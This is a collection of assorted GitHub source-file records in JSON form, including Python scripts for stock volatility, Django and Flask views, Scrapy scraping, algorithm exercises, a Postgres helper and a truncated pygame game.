+{"seq_id":"33495111637","text":"import numpy as np\nimport pandas as pd\nimport pandas_datareader.data as pdr\nimport fix_yahoo_finance as yf\nimport arch\nimport matplotlib.pyplot as plt\nfrom statsmodels.graphics.tsaplots import plot_acf\nyf.pdr_override()\n\n\nclass stock_vol:\n\n\tdef __init__(self, tk, start, end):\n\t\tself.tk = tk\n\t\tself.start = start\n\t\tself.end = end\n\t\tall_data = pdr.get_data_yahoo(self.tk, start=self.start, end=self.end)\n\t\tself.stock_data = pd.DataFrame(all_data['Adj Close'], columns=[\"Adj Close\"])\n\t\tself.stock_data[\"log\"] = np.log(self.stock_data)-np.log(self.stock_data.shift(1))\n\n\tdef mean_sigma(self):\n\t\tst = self.stock_data[\"log\"].dropna().ewm(span=252).std()\n\t\tsigma = st.iloc[-1]\n\t\treturn sigma\n\n\tdef garch_sigma(self):\n\t\tmodel = arch.arch_model(self.stock_data[\"log\"].dropna(), mean='Zero', vol='GARCH', p=1, q=1)\n\t\tmodel_fit = model.fit()\n\t\tforecast = model_fit.forecast(horizon=1)\n\t\tvar = forecast.variance.iloc[-1]\n\t\tsigma = float(np.sqrt(var))\n\t\treturn sigma\n\n\nif __name__ == \"__main__\":\n\tvol = stock_vol(\"AAPL\", start=\"2016-01-01\", end=\"2016-03-01\")\n\ttest = vol.stock_data[\"log\"].dropna()\n\tprint(test)\n\tfig = plot_acf(test)\n\tplt.show()\n","repo_name":"VivekPa/BinomialOptModel","sub_path":"stock_volatility.py","file_name":"stock_volatility.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"37"} +{"seq_id":"11097856814","text":"from threading import Thread\n\n\ndef squares(s, e):\n for i in range(s, e):\n print(i * i)\n\n\nt = Thread(target=squares, args=(10, 15))\nt.start()\nprint('Main Ends Here!')\n","repo_name":"srikanthpragada/PYTHON_29_OCT_2020","sub_path":"demo/libdemo/thread_target_demo.py","file_name":"thread_target_demo.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36183473429","text":"import sublime, sublime_plugin\nimport datetime\n\n'''\nConvert a unix timestamp to a readable datetime string according to FORMAT.\nIt does nothing if not a valid timestamp.\nExample:\n input: 1406216630\n output: \"Thu 24/07/2014 15:43:50 UTC\"\n'''\n\nFORMAT = '\"%a %d/%m/%Y %H:%M:%S UTC\"'\n\nclass UnixTsToDatetimeCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n for region in self.view.sel():\n if region.empty():\n continue\n text = self.view.substr(region)\n\n if not self._is_int(text):\n continue\n\n replacement = self._timestamp_to_userfriendly_datetime(text)\n if replacement:\n self.view.replace(edit, region, replacement)\n else:\n continue\n\n def _timestamp_to_userfriendly_datetime(self, timestamp):\n try:\n return datetime.datetime.utcfromtimestamp(int(timestamp)).strftime(FORMAT)\n except OSError as e:\n return False\n\n def _is_int(self, test):\n try:\n int(test)\n except ValueError as e:\n return False\n else:\n return True\n","repo_name":"nmalbran/sublime-conf","sub_path":"st3/unix_ts_to_datetime.py","file_name":"unix_ts_to_datetime.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2199923328","text":"from django.shortcuts import render, redirect\r\nfrom .models import Repo, Contributor, Commit, Language\r\nfrom .forms import RepoForm\r\nfrom django.http import JsonResponse, HttpResponse\r\nfrom django.core import serializers\r\n\r\ndef home(request):\r\n if request.method == 'POST':\r\n form = RepoForm(request.POST)\r\n if form.is_valid():\r\n repo = form.save()\r\n return redirect('info', pk=repo.pk)\r\n else:\r\n form = RepoForm()\r\n return render(request, 'github/home.html', { 'form' : form })\r\n\r\ndef info(request, pk):\r\n repo = Repo.objects.get(pk=pk)\r\n contributors = repo.contributor_set.first()\r\n commits = repo.commit_set.all()\r\n languages = repo.language_set.all()\r\n return render(request, 'github/info.html', {'repo':repo,'contributors':contributors,'commits':commits,'languages':languages})\r\n\r\ndef api(request, pk):\r\n repo = Repo.objects.get(pk=pk)\r\n contributors = serializers.serialize('json', [repo.contributor_set.first()])\r\n return JsonResponse({'repo':repo,'contributors':contributors})\r\n\r\ndef api_list(request, pk):\r\n repo = Repo.objects.get(pk=pk)\r\n commits = list(repo.commit_set.all().values())\r\n languages = list(repo.language_set.all().values())\r\n return JsonResponse({'commits' : commits, 'languages' : languages})\r\n\r\ndef searches(request):\r\n repos = Repo.objects.all()\r\n return render(request, 'github/searches.html', { 'repos' : repos })\r\n","repo_name":"ryanmg14/GitGud","sub_path":"backend/github/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27278965331","text":"def printLCS(s1,s2) :\n n=len(s1)\n m=len(s2)\n\n dp = [[-1 for _ in range(m+1)] for _ in range(n+1) ]\n\n for i in range(n+1):\n dp[i][0] = 0\n for i in range(m+1):\n dp[0][i] = 0\n s_len = 0\n row = n\n col = m\n for i in range(1,n+1) :\n for j in range(1,m+1) :\n if s1[i-1] == s2[j-1]:\n dp[i][j] = 1+dp[i-1][j-1]\n else:\n dp[i][j] = 0\n # s_len = max(s_len, dp[i][j])\n if dp[i][j] > s_len:\n row = i\n col = j\n s_len= dp[i][j]\n\n lcs =''\n print('row = ',row)\n print('col = ',col)\n for i in range(n + 1):\n for j in range(m + 1):\n print(dp[i][j], ' ', end='')\n print()\n while row > 0 and col > 0:\n if s1[row-1] == s2[col-1]:\n lcs+=s2[col-1]\n row-=1\n col-=1\n else:\n if dp[row-1][col] > dp[row][col-1] :\n row-=1\n else:\n col-=1\n print('longest common substring = ',lcs[::-1])\n return s_len\n\n\nif __name__ == '__main__':\n text1 = \"abcdxyz\"\n text2 = \"xyzabcd\"\n\n lcs2 = printLCS(text1, text2)\n print('ANS (tabular) = ', lcs2)\n #\n #\n # #\n # open_chars = ['(', '[', '{']\n # closed_reversed = {\n # ')': '(',\n # ']': '[',\n # '}': '{'\n # }\n #\n # stack = []\n # for ch in line:\n # if ch in open_chars:\n # stack.append(ch)\n # elif len(stack) < 1 or stack.pop() != closed_reversed[ch]:\n # return False\n #\n # return len(stack) == 0\n","repo_name":"smzgit/DSA-python","sub_path":"17_Dynamic Programming/15_print_LC_substring.py","file_name":"15_print_LC_substring.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29163054782","text":"from flask import request, Response\nimport json\n\n\nclass Interface:\n def __init__(self, model, metrics):\n self.model = model\n self.metrics = metrics\n\n def predict(self):\n pass\n\n def train(self):\n payload = request.json\n y = payload[\"target\"]\n x = payload[\"features\"]\n\n y_pred = self.model.predict_one(x)\n\n for metric in self.metrics:\n metric.update(y, y_pred)\n\n self.model.learn_one(x, y)\n\n return Response({}, status=201, content_type=\"application/json\")\n\n def metric(self):\n response = {}\n\n for metric in self.metrics:\n response.update({f\"{metric.__class__.__name__}\": metric.get()})\n\n return Response(\n json.dumps(response), status=201, content_type=\"application/json\"\n )\n\n def registerToApp(\n self,\n app,\n prediction_route_url=\"predict\",\n training_route_url=\"train\",\n metric_route_url=\"metric\",\n ):\n app.add_url_rule(\n f\"/{prediction_route_url}\", \"predict\", self.predict, methods=[\"POST\"]\n )\n app.add_url_rule(\n f\"/{training_route_url}\", \"train\", self.train, methods=[\"POST\"]\n )\n app.add_url_rule(f\"/{metric_route_url}\", \"metric\", self.metric, methods=[\"GET\"])\n","repo_name":"sebiwtt/flaskriver","sub_path":"flaskriver/Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"26191395643","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom mind.items import MindItem\n\n\nclass DoubanSpiderSpider(scrapy.Spider):\n name = 'douban_spider'\n allowed_domains = ['douban.com']\n start_urls = ['https://movie.douban.com/top250']\n\n def parse(self, response):\n x = response.xpath(\"//ol[@class='grid_view']/li\")\n for item in x:\n douban_item = MindItem()\n douban_item['movie_rank'] = item.xpath(\".//em/text()\").extract_first()\n douban_item['movie_name'] = item.xpath(\".//span[@class='title']/text()\").extract_first()\n douban_item['movie_score'] = item.xpath(\".//span[@class='rating_num']/text()\").extract_first()\n douban_item['movie_describe'] = item.xpath(\".//span[@class='inq']/text()\").extract_first()\n douban_item['movie_pic'] = item.xpath(\".//div[@class='pic']//img/@src\").extract_first()\n #douban_item['movie_star'] = item.xpath(\".//div[@class='star']/span[0]/@class\").extract()\n #传递数据\n yield douban_item\n print(douban_item)\n\n\n next_link = response.xpath(\"//div[@class='paginator']//span[@class='next']//a/@href\").extract()\n if next_link:\n next_url = self.start_urls[0] + next_link[0]\n yield scrapy.Request(next_url, callback=self.parse)\n\n\n","repo_name":"whyinlijun/mind","sub_path":"mind/spiders/douban_spider.py","file_name":"douban_spider.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7083561675","text":"from django.contrib import admin\nfrom users.models import Profile\n# Register your models here.\n\n@admin.register(Profile)\nclass ProfileAdmin(admin.ModelAdmin):\n \"\"\"Profile admin.\"\"\"\n list_display = ('user', 'phone_number', 'website', 'picture')\n list_display_links = ('user', 'website')\n list_editable = ('phone_number', 'picture')\n search_fields = ('user__email', 'user__first_name', 'user_last_name')\n list_filter = ('created', 'modified')","repo_name":"diegocastroplazas/django_tuto2","sub_path":"platzigram/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17455023526","text":"# 1). Stwórz funkcję nazwaną dodajListy() która zwróci nową listę sumując ze sobą elementy na tych samych indeksach.\n# Możesz przypuścić, że jako parametry do funkcji podawane są zawsze listy zawierające tylko liczby.\n# Jeżeli listy są różnej długości, funkcja powinna wyświetlić napis ‘Podane listy muszą być tej samej długości’\n\ndef dodajListy(A, B):\n\tC = []\n\tif len(A) == len(B):\n\t\tfor x, y in zip(A, B):\n\t\t\tC.append(x + y)\n\t\treturn C\n\tif len(A) != len(B):\n\t\t\treturn \"Podane listy muszą być tej samej długości\"\n\n\nif __name__ == \"__main__\":\n\t\tlista_1 = []\n\t\tlista_2 = []\n\t\tdl_listy_1 = int(input('Podaj liczbę elementów pierwszej listy: '))\n\t\tfor item in range(dl_listy_1):\n\t\t\tdigit = int(input('Podaj liczbę którą chcesz dodać do listy: '))\n\t\t\tlista_1.append(digit)\n\t\tdl_listy_2 = int(input('Podaj liczbę elementów drugiej listy: '))\n\t\tfor item in range(dl_listy_2):\n\t\t\tdigit = int(input('Podaj liczbę którą chcesz dodać do listy: '))\n\t\t\tlista_2.append(digit)\n\t\tprint('Łączna wartość liczb z listy_1 i listy_2 wynosi: ', dodajListy(lista_1, lista_2))\n\n","repo_name":"Mardmoo/ISA-Bootcamp_zadania-domowe","sub_path":"Zjazd_2/praca_domowa_zjazd2_1.py","file_name":"praca_domowa_zjazd2_1.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75223341547","text":"import random\n\n\n# Ask the player to choose its option\ndef play():\n player = input(\"What's your choice? 'R' for Rock, 'P' for Paper, 'S' for Scissor\\n\").lower()\n computer = random.choice(['r', 'p', 's'])\n\n if player == computer:\n return f'''\n You: {choice_name(player)}\\n\n Computer: {choice_name(computer)}\\n\n It's a tie!\n '''\n elif is_win(player, computer):\n return f'''\n You: {choice_name(player)}\\n\n Computer: {choice_name(computer)}\\n\n You won!\n '''\n else:\n return f'''\n You: {choice_name(player)}\\n\n Computer: {choice_name(computer)}\\n\n You lose!\n '''\n\n\n# r > s, s > p, p > r\ndef is_win(player, computer):\n if (player == 'r' and computer == 's') or (player == 's' and computer == 'p') or \\\n (player == 'p' and computer == 'r'):\n return True\n\n\ndef choice_name(choice):\n if choice == 'r':\n return \"Rock\"\n elif choice == 'p':\n return \"Paper\"\n else:\n return \"Scissor\"\n\n\nmatch = play()\nprint(match)\n","repo_name":"felipefcampelo/python-rock-paper-scissor","sub_path":"rock_paper_scissor.py","file_name":"rock_paper_scissor.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"432329553","text":"import psycopg2\n\nclass Database():\n\n def __init__(self):\n #Params for connect Postgres database\n self.USER_DB=\"soar\"\n self.PASSW_DB= \"soar\"\n self.HOST_DB=\"localhost\"\n self.NAME_DB=\"prueba\"\n self.connection = psycopg2.connect(\n host=self.HOST_DB,\n database=self.NAME_DB,\n user=self.USER_DB,\n password=self.PASSW_DB)\n\n\n def make_query(self, query):\n cur = self.connection.cursor()\n cur.execute(query)\n id = cur.fetchall()\n\n #print(\"id= \",id,\" typeId= \",type(id))\n #print(id[0], \" type --> \", type(id[0]))\n #print(\"final result--> \",id[0][0])\n\n cur = self.connection.cursor()\n self.connection.commit()\n cur.close()\n return id[0][0] #return the id of the last insert\n\n\n def make_insert_database(self, inserts : list):\n '''\n param: inserts [] Array of differents inserts.\n\n Connect to database and execute the differents inserts of param 'inserts'\n '''\n cur = self.connection.cursor()\n for insert in inserts:\n #print(\"insert --> \", insert)\n cur.execute(insert)\n\n cur = self.connection.cursor()\n self.connection.commit()\n cur.close()\n \n\n def transformIndex(self, line):\n return line.replace(\"index\",\"index_\")\n\n\n def transform(self, line):\n return line.replace(\"{}.\", \"_\")\n\n\n def get_all_inserts_from_json(self, jsonToDatabase, add_insert, table_name, parser, isAlert=True):\n '''\n Translate a JSON to a SQL insert\n '''\n #print(\"\\n\\nJSON DATABASE\",jsonToDatabase)\n insert=\"INSERT INTO \"+ table_name +\" (\" + ','.join(parser)+\") VALUES (\"\n auxDicc=parser.copy()\n if isAlert==True:\n last_key = list(auxDicc)[-1]\n # remove the last key using .pop() method\n removed_tuple = auxDicc.pop(last_key)\n insert = self.transformIndex(insert)\n else:\n insert = self.transform(insert)\n first_value_insert=True\n for key in auxDicc.keys():\n try:\n if first_value_insert:\n insert+=\"'\"+str(jsonToDatabase[key])+\"'\"\n first_value_insert=False\n else:\n if type(jsonToDatabase[key]) == list:\n insert+=\", ARRAY \"+str(jsonToDatabase[key])\n elif jsonToDatabase[key][0] == '<': # xml format\n insert += \", '\" +str(jsonToDatabase[key]).replace(\"'\",\"\")+\"'\"\n else:\n insert+=\", '\"+str(jsonToDatabase[key])+\"'\"\n except:\n insert+= \",' '\" #This var is not found on javascript\n if isAlert==True:\n insert+=\",1)\"\n else:\n insert+=\")\"\n #print(insert)\n add_insert.append(insert)\n\n\n def join_all_inserts(self, all_inserts : list, on_conflict_insert=\"\"):\n '''\n Join differents insert for the same table.\n Return a string with all this inserts.\n\n For example if we have\n Insert into (...) values (...); :a1\n Insert into
    (...) values (...); :a2\n ...\n Insert into
    (...) values (...); :an\n\n For do this inserts more efectivly is better do\n Insert into
    (...) values a1, ..., an;\n '''\n if len(all_inserts)==0:\n return -1\n\n if len(all_inserts)==1:\n return all_inserts[0] + \" \"+ on_conflict_insert\n \n final_insert=\"\"\n first_value=True\n for i in all_inserts:\n #aux=i.upper().split(\"VALUES (\")\n aux=i.split(\"VALUES (\")\n if first_value:\n final_insert+=aux[0]+\" VALUES (\" #This is INSERT INTO
    values\n final_insert+=aux[1]\n first_value=False\n else:\n final_insert+=\", \" #For separate diferents inserts\n final_insert+=\"(\"+aux[1]\n #if final_insert == \"\":\n # return -1\n #else:\n final_insert += \" \"+ on_conflict_insert\n return final_insert\n\n\n## Testing ## \n#join_all_inserts#\n'''\ndatabase = Database()\n\nlist_querys = [\"INSERT INTO persona(nombre, edad, DNI) VALUES ('macia','10','asdf')\", \"INSERT INTO persona(nombre, edad, DNI) VALUES ('juan','39','fghf')\"]\nres=database.join_all_inserts(list_querys)\nprint(res,'\\n')\n\nlist_querys = []\nres=database.join_all_inserts(list_querys)\nprint(res,'\\n')\n\nlist_querys = [\"INSERT INTO persona(nombre, edad, DNI) VALUES ('macia','10','asdf')\"]\nres=database.join_all_inserts(list_querys, \"ON CONFLICT (dni) \")\nprint(res,'\\n')\n'''\n\n##make_insert_database(self, insert)\n# make_insert_database(insert)\n'''\ndatabase = Database()\n\ninsert = [\"INSERT INTO usr(name) VALUES ('test1'), ('test2')\", \"INSERT INTO usr(name) VALUES ('test4'), ('test3')\"]\nres=database.make_insert_database(insert)\n'''\n\n# make_query(self, query)\n'''\ndatabase = Database()\nquery = 'select * from usr'\nres = database.make_query(query)\nprint(res)\n'''\n","repo_name":"MaciaKing/Soar","sub_path":"Back-End/Server/Database/Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34240093533","text":"import unicodedata\n\nfrase = input('Ingrese una frase para saber si es palíndromo: \\n')\n\ndef reconocer_palindromo(frase):\n frase = ''.join(c for c in frase if c.isalnum())\n frase = ''.join((c for c in unicodedata.normalize('NFD', frase) if unicodedata.category(c) != 'Mn'))\n frase = frase.lower()\n\n if frase == frase[::-1]:\n print('La frase es palíndromo')\n else:\n print('La frase no es palíndromo')\n\nreconocer_palindromo(frase)\n","repo_name":"Enriquepardo/Ejercicios-de-recursividad","sub_path":"ejercicio 6/reconocer_palindromos.py","file_name":"reconocer_palindromos.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36340593547","text":"# takes input and converts to integer using list comprehension\na = [int(x) for x in input().split()] \n\nprint(max(a))\n\ntxt = input()\n\nrev_string = txt[::-1]\n\nif txt == rev_string :\n print(\"Palindrome\")\nelse :\n print(\"Not a Palindrome\")\n\ntext = input()\n\nvowels = ['a','e','i','o','u','A','E','I','O','U']\n\ntext_no_vowels = \"\"\n\nfor character in text :\n if character not in vowels :\n text_no_vowels = text_no_vowels + character\n\nprint(text_no_vowels)\n\nimport csv\n\nwith open(\"csv_files.txt\", mode='r') as file :\n\n csv_file = csv.reader(file)\n\n for line in csv_file :\n print(line)\n\ncp_subjects = {\"painting\":124, \"advertisement\":123, \"dance\":126, \"music\":125}\nprint(cp_subjects['advertisement'])\n\nsorted_dict = dict(sorted(cp_subjects.items(), key=lambda x:x[1]))\nprint(sorted_dict)","repo_name":"tmsunnyduck/python-learning","sub_path":"excersises/google_form_max.py","file_name":"google_form_max.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27278895391","text":"def binary_search(arr, key, low, high):\n while high > low:\n mid = (low + high) // 2\n print('arr mid = ', arr[mid])\n if arr[mid] == key:\n return f'{key} exists in the array at index {mid}'\n elif key < arr[mid]:\n high = mid\n else:\n low = mid + 1\n return f'{key} doesnt exists in the array'\n\n\nif __name__ == '__main__':\n arr = [12, 41, 55, 1, 2, 90, 51, 88]\n arr.sort()\n print(arr)\n low, high = 0, len(arr)\n key = 88\n print(binary_search(arr, key, low, high))\n","repo_name":"smzgit/DSA-python","sub_path":"13_Searching/2_Binary_Search.py","file_name":"2_Binary_Search.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39949653661","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n\n# Changes UI language through CLI\ndef pytest_addoption(parser):\n parser.addoption('--language', action='store', default='--lang=en',\n help='Choose language - default is English (UK)')\n\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n # Changes UI language using Options instance\n options_set = Options()\n user_language = request.config.getoption(\"language\")\n options_set.add_experimental_option('prefs', {'intl.accept_languages': user_language})\n\n # Launches browser with a set of options\n print(\"\\nStarting Chrome browser for testing...\")\n browser = webdriver.Chrome(options=options_set)\n yield browser\n\n # Closes browser\n print(\"\\nQuitting browser...\")\n browser.quit()\n","repo_name":"Elieeeya/Selenium_Python_project","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28364192028","text":"from django.contrib import auth, messages\r\nfrom django.shortcuts import render, HttpResponseRedirect\r\nfrom .models import User\r\nfrom .forms import UserLoginForm, UserRegForm, UserProfileForm\r\n\r\n\r\ndef login(request):\r\n if request.method == 'POST':\r\n form = UserLoginForm(data=request.POST)\r\n if form.is_valid():\r\n username = request.POST['username']\r\n password = request.POST['password']\r\n user = auth.authenticate(username=username, password=password)\r\n if user:\r\n auth.login(request, user)\r\n return HttpResponseRedirect('/')\r\n else:\r\n form = UserLoginForm()\r\n context = {'form': form}\r\n return render(request, 'users/login.html', context)\r\n\r\n\r\ndef register(request):\r\n if request.method == 'POST':\r\n form = UserRegForm(data=request.POST)\r\n if form.is_valid():\r\n form.save()\r\n messages.success(request, 'Вы зарегистрировались!')\r\n return HttpResponseRedirect('/')\r\n else:\r\n form = UserRegForm()\r\n context = {'form': form}\r\n return render(request, 'users/register.html', context)\r\n\r\n\r\ndef profile(request):\r\n if request.method == 'POST':\r\n form = UserProfileForm(instance=request.user, data=request.POST)\r\n if form.is_valid():\r\n form.save()\r\n return 1\r\n else:\r\n print(form.errors)\r\n else:\r\n form = UserProfileForm(instance=request.user)\r\n context = {'title': 'Я каменщик', 'form': form}\r\n return render(request, 'users/profile.html', context)\r\n\r\n\r\ndef logout(request):\r\n auth.logout(request)\r\n return HttpResponseRedirect('/')\r\n\r\n","repo_name":"Asssmodei/Store_on_Django","sub_path":"Store/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25628069446","text":"\"\"\" Cross-object data auditing\n\nSchema validation allows for checking values within a single object.\nWe also need to perform higher order checking between linked objects.\n\"\"\"\n\nimport logging\nimport venusian\nfrom past.builtins import basestring\nfrom pyramid.view import view_config\nfrom .calculated import calculated_property\nfrom .elasticsearch.interfaces import ICachedItem\nfrom .interfaces import (\n AUDITOR,\n TYPES,\n)\nfrom .resources import Item\n\nlogger = logging.getLogger(\"__name__\")\nlogger.setLevel(logging.ERROR)\n\n\ndef includeme(config):\n config.include('.calculated')\n config.include('.typeinfo')\n config.scan(__name__)\n config.registry[AUDITOR] = Auditor()\n config.add_directive('add_audit_checker', add_audit_checker)\n config.add_request_method(audit, 'audit')\n\n\n# Same as logging\n_levelNames = {\n 0: 'NOTSET',\n 10: 'DEBUG',\n 20: 'INFO',\n 30: 'INTERNAL_ACTION',\n 40: 'WARNING',\n 50: 'NOT_COMPLIANT',\n 60: 'ERROR',\n 'DEBUG': 10,\n 'ERROR': 60,\n 'INFO': 20,\n 'NOTSET': 0,\n 'WARNING': 40,\n 'NOT_COMPLIANT': 50,\n 'INTERNAL_ACTION': 30,\n}\n\n\nclass AuditFailure(Exception):\n def __init__(self, category, detail=None, level=0, path=None, name=None):\n super(AuditFailure, self)\n self.category = category\n self.detail = detail\n if not isinstance(level, int):\n level = _levelNames[level]\n self.level = level\n self.path = path\n self.name = name\n\n def __json__(self, request=None):\n return {\n 'category': self.category,\n 'detail': self.detail,\n 'level': self.level,\n 'level_name': _levelNames[self.level],\n 'path': self.path,\n 'name': self.name,\n }\n\n\nclass Auditor(object):\n \"\"\" Data audit manager\n \"\"\"\n _order = 0\n\n def __init__(self):\n self.type_checkers = {}\n\n def add_audit_checker(self, checker, item_type, condition=None, frame='embedded'):\n checkers = self.type_checkers.setdefault(item_type, [])\n self._order += 1 # consistent execution ordering\n if isinstance(frame, list):\n frame = tuple(sorted(frame))\n checkers.append((self._order, checker, condition, frame))\n\n def audit(self, request, types, path, **kw):\n if isinstance(types, basestring):\n types = [types]\n checkers = set()\n checkers.update(*(self.type_checkers.get(item_type, ()) for item_type in types))\n errors = []\n system = {\n 'request': request,\n 'path': path,\n 'types': types,\n }\n system.update(kw)\n for order, checker, condition, frame in sorted(checkers):\n if frame is None:\n uri = path\n elif isinstance(frame, basestring):\n uri = '%s@@%s' % (path, frame)\n else:\n uri = '%s@@expand?expand=%s' % (path, '&expand='.join(frame))\n value = request.embed(uri)\n\n if condition is not None:\n try:\n if not condition(value, system):\n continue\n except Exception as e:\n detail = '%s: %r' % (checker.__name__, e)\n failure = AuditFailure(\n 'audit condition error', detail, 'ERROR', path, checker.__name__)\n errors.append(failure.__json__(request))\n logger.warning('audit condition error auditing %s', path, exc_info=True)\n continue\n try:\n try:\n result = checker(value, system)\n except AuditFailure as e:\n e = e.__json__(request)\n if e['path'] is None:\n e['path'] = path\n e['name'] = checker.__name__\n errors.append(e)\n continue\n if result is None:\n continue\n if isinstance(result, AuditFailure):\n result = [result]\n for item in result:\n if isinstance(item, AuditFailure):\n item = item.__json__(request)\n if item['path'] is None:\n item['path'] = path\n item['name'] = checker.__name__\n errors.append(item)\n continue\n raise ValueError(item)\n except Exception as e:\n detail = '%s: %r' % (checker.__name__, e)\n failure = AuditFailure(\n 'audit script error', detail, 'ERROR', path, checker.__name__)\n errors.append(failure.__json__(request))\n logger.warning('audit script error auditing %s', path, exc_info=True)\n continue\n return errors\n\n\n# Imperative configuration\ndef add_audit_checker(config, checker, type_, condition=None, frame='embedded'):\n def callback():\n types = config.registry[TYPES]\n ti = types[type_]\n auditor = config.registry[AUDITOR]\n auditor.add_audit_checker(checker, ti.name, condition, frame)\n\n config.action(None, callback)\n\n\n# Declarative configuration\ndef audit_checker(type_, condition=None, frame='embedded'):\n \"\"\" Register an audit checker\n \"\"\"\n\n def decorate(checker):\n def callback(scanner, factory_name, factory):\n scanner.config.add_audit_checker(\n checker, type_, condition, frame)\n\n venusian.attach(checker, callback, category=AUDITOR)\n return checker\n\n return decorate\n\n\ndef audit(request, types=None, path=None, context=None, **kw):\n auditor = request.registry[AUDITOR]\n if path is None:\n path = request.path\n if context is None:\n context = request.context\n if types is None:\n types = [context.type_info.name] + context.type_info.base_types\n return auditor.audit(\n request=request, types=types, path=path, root=request.root, context=context,\n registry=request.registry, **kw)\n\n\n# Views\ndef traversed_path_ids(request, obj, path):\n if isinstance(path, basestring):\n path = path.split('.')\n if not path:\n yield obj if isinstance(obj, basestring) else obj['@id']\n return\n name = path[0]\n remaining = path[1:]\n value = obj.get(name, None)\n if value is None:\n return\n if not isinstance(value, list):\n value = [value]\n for member in value:\n if remaining and isinstance(member, basestring):\n member = request.embed(member, '@@object')\n for item_uri in traversed_path_ids(request, member, remaining):\n yield item_uri\n\n\ndef inherit_audits(request, embedded, embedded_paths):\n audit_paths = {embedded['@id']}\n for embedded_path in embedded_paths:\n audit_paths.update(traversed_path_ids(request, embedded, embedded_path))\n\n audits = {}\n for audit_path in audit_paths:\n result = request.embed(audit_path, '@@audit-self')\n for audit in result['audit']:\n if audit['level_name'] in audits:\n audits[audit['level_name']].append(audit)\n else:\n audits[audit['level_name']] = [audit]\n return audits\n\n\n@view_config(context=Item, permission='audit', request_method='GET',\n name='audit-self')\ndef item_view_audit_self(context, request):\n path = request.resource_path(context)\n types = [context.type_info.name] + context.type_info.base_types\n return {\n '@id': path,\n 'audit': request.audit(types=types, path=path),\n }\n\n\n@view_config(context=Item, permission='audit', request_method='GET',\n name='audit')\ndef item_view_audit(context, request):\n path = request.resource_path(context)\n properties = request.embed(path, '@@object')\n inherit = context.audit_inherit\n embedded_paths = context.embedded_paths()\n if embedded_paths and '*' in context.audit_inherit:\n inherit = embedded_paths\n else:\n inherit = context.audit_inherit or []\n audit = inherit_audits(request, properties, inherit)\n return {\n '@id': path,\n 'audit': audit,\n }\n\n\ndef audit_condition(context, request):\n # Audits must be explicitly requested if they\n # are not available in precached form from elasticsearch\n force_audit = request.params.get('audit', False)\n if not ICachedItem.providedBy(context) and not force_audit:\n return False\n # Don't embed audits unless user has permission to see them\n if not request.has_permission('audit'):\n return False\n return True\n\n\n@calculated_property(context=Item, category='page', name='audit',\n condition=audit_condition)\ndef audit_property(context, request):\n path = request.resource_path(context)\n return request.embed(path, '@@audit')['audit']\n","repo_name":"ENCODE-DCC/snovault","sub_path":"src/snovault/auditor.py","file_name":"auditor.py","file_ext":"py","file_size_in_byte":8921,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"38569177934","text":"import pygame\r\nfrom classes import person, projectile, enemy\r\npygame.init()\r\n\r\n#Initializing Game\r\nwinSize = width, height = 800, 500\r\nWIN = pygame.display.set_mode(winSize)\r\npygame.display.set_caption(\"808 BLASTER >:)\")\r\nclock = pygame.time.Clock()\r\nfps = 30\r\ndifficulty = 15\r\nscore = 0\r\nlives = 3\r\n\r\n#Assets\r\n #Images\r\nbg = pygame.image.load('808Blaster/Images/background.jpg')\r\n\r\nwalkR = [pygame.image.load('808Blaster/Images/runcycle/F2.png'), pygame.image.load('808Blaster/Images/runcycle/F1.png')]\r\nwalkL = [pygame.transform.flip(walkR[0], True, False), pygame.transform.flip(walkR[1], True, False)]\r\ncharR = pygame.image.load('808Blaster/Images/character.png') # 100 X 140\r\ncharL = pygame.transform.flip(charR, True, False)\r\ncrouchR = pygame.image.load('808Blaster/Images/crouch.png') # 100 x 75\r\ncrouchL = pygame.transform.flip(crouchR, True, False)\r\n\r\nprojR = pygame.image.load('808Blaster/Images/808.png') # 70 x 50\r\nprojR = pygame.transform.scale(projR, 